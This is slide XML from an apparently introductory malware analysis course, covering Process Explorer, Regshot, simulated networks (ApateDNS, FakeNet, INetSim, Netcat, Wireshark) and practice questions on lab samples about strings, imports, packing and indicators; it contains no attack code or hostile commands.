              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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17648"/>
            <a:ext cx="6268292" cy="4071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2532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a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Explorer (procexp.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Company</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>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800191"/>
            <a:ext cx="6810524" cy="4600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82876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a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="4546848" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Explorer -&gt; Verify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MS uses digital signatures for most of its core executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware often replaces authentic Windows files with its own in an attempt to hide</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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193673"/>
            <a:ext cx="4044500" cy="511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11248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a:t>Process Explorer -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Compare Strings </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Compare strings contained in the disk executables (images)against strings in memory to recognize the replacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>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958608"/>
            <a:ext cx="5832648" cy="3573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435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GB" dirty="0" smtClean="0"/>
              <a:t>Malicious code/Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>code that is capable of causing harm to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> of code or data, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>computing system encompasses including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>irus, Trojan horse, worm, rootkit, scareware, spyware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>set of instructions that run on your computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>your system do something that an attacker wants it to do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17756570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801052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smtClean="0"/>
              <a:t>Comparing Registry snapshots by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Regshot</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF000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49" y="1792501"/>
            <a:ext cx="4281292" cy="43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52602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Faking a Network</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Malware often beacons out and eventually communicates with a command-and-control server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>A fake network allows us to obtain network indicators (DNS names, IP, packet signatures) without connecting to the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Some malware can realise that it is executing in a virtualized environment (e.g. VMware).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>FakeNet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2526321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Faking a Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sdl-apateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.fireeye.com/services/freeware/apatedns.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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145049"/>
            <a:ext cx="6621016" cy="4439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9737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Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring common ports used by malwares (80, 443, …)</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34" y="3356992"/>
            <a:ext cx="8867921" cy="172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12637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Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>INetSim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.inetsim.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>): Linux-based app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988841"/>
            <a:ext cx="5786970" cy="4090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34415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Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark</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72815"/>
            <a:ext cx="7173576" cy="508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7253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1 [Surface Analysis]</a:t>
            </a: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GB" dirty="0" smtClean="0"/>
              <a:t>File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Lab01-01.exe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Lab01-01.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PeiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Virustotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Imports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787912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2 [Pack &amp; Unpack]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Lab01-02.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Compare the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Imports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> differences before/after unpacking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Compare Entry Points, Sections?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20424192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3 [Surface &amp; Dynamic Analysis]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>PE File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Lab03-01.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>What are the malware’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>imports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>What are the malware’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>host-based indicators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Are there any useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>network-based signatures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>for this malware? If so, what are they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>How to detect the malware?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Estimation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11724765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Practice 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[Surface &amp; Dynamic Analysis]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GB" b="1" dirty="0" smtClean="0"/>
              <a:t>PE file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Lab03-03.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>What happening when this malware executes (monitoring by Process Explorer)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
